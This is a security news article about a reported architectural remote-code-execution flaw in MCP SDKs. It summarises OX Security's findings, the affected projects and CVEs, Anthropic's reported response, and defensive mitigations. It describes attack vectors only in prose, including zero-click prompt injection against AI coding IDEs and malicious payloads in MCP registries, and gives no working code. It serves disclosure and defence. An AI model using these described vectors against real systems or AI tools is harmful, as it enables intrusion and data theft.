Critical Vulnerability in Anthropic MCP SDKs Endangers Millions with Remote Code Execution Risk

Critical Vulnerability in Anthropic’s MCP Exposes Millions to Remote Code Execution

A critical vulnerability has been identified in Anthropic’s Model Context Protocol (MCP), potentially compromising over 150 million downloads and exposing up to 200,000 servers to full system takeover. This flaw, discovered by the OX Security Research team, is embedded within Anthropic’s official MCP Software Development Kits (SDKs) across multiple programming languages, including Python, TypeScript, Java, and Rust.

Unlike typical coding errors, this vulnerability is architectural, meaning that any developer building upon Anthropic’s MCP foundation inadvertently inherits this security risk. The flaw enables Arbitrary Command Execution (RCE) on any system running a vulnerable MCP implementation. Successful exploitation grants attackers direct access to sensitive user data, internal databases, API keys, and chat histories, effectively handing over complete control of the affected environment.

Exploitation Methods:

Researchers have identified four primary exploitation vectors:

1. Unauthenticated UI Injection: Targeting popular AI frameworks, attackers can inject malicious code without authentication.

2. Hardening Bypasses: Even in environments with enhanced security measures, such as Flowise, attackers can circumvent protections.

3. Zero-Click Prompt Injection: AI Integrated Development Environments (IDEs) like Windsurf and Cursor are susceptible to prompt injections that require no user interaction.

4. Malicious Marketplace Distribution: Out of 11 MCP registries tested, 9 were successfully compromised with malicious payloads.

OX Security confirmed successful command execution on six live production platforms, including critical vulnerabilities in LiteLLM, LangChain, and IBM’s LangFlow. The research has led to the identification of at least 10 Common Vulnerabilities and Exposures (CVEs) across multiple high-profile projects. Several critical flaws have been patched, including CVE-2026-30623 in LiteLLM and CVE-2026-33224 in Bisheng.

Anthropic’s Response:

Despite the severity of the findings, Anthropic has described the behavior as expected and declined to implement a protocol-level patch that could have immediately protected millions of downstream users. This response comes shortly after Anthropic unveiled Claude Mythos, positioned as a tool to help secure the world’s software, highlighting a need for the company to apply Secure by Design principles to its own infrastructure.

Mitigation Strategies:

To protect your environment from potential exploitation:

– Restrict Public Access: Block public internet access to AI services connected to sensitive APIs or databases.

– Treat Inputs as Untrusted: Consider all external MCP configuration input as untrusted; block or restrict user-controlled inputs to STDIO parameters.

– Verify Sources: Install MCP servers only from verified sources, such as the official GitHub MCP Registry.

– Implement Sandboxing: Run MCP-enabled services inside sandboxes with restricted permissions.

– Monitor Activity: Keep an eye on all tool invocations for unexpected background activity or data exfiltration attempts.

– Update Services: Immediately update all affected services to their latest patched versions.

OX Security has deployed platform-level detections to identify unsafe STDIO MCP configurations in customer codebases and AI-generated code.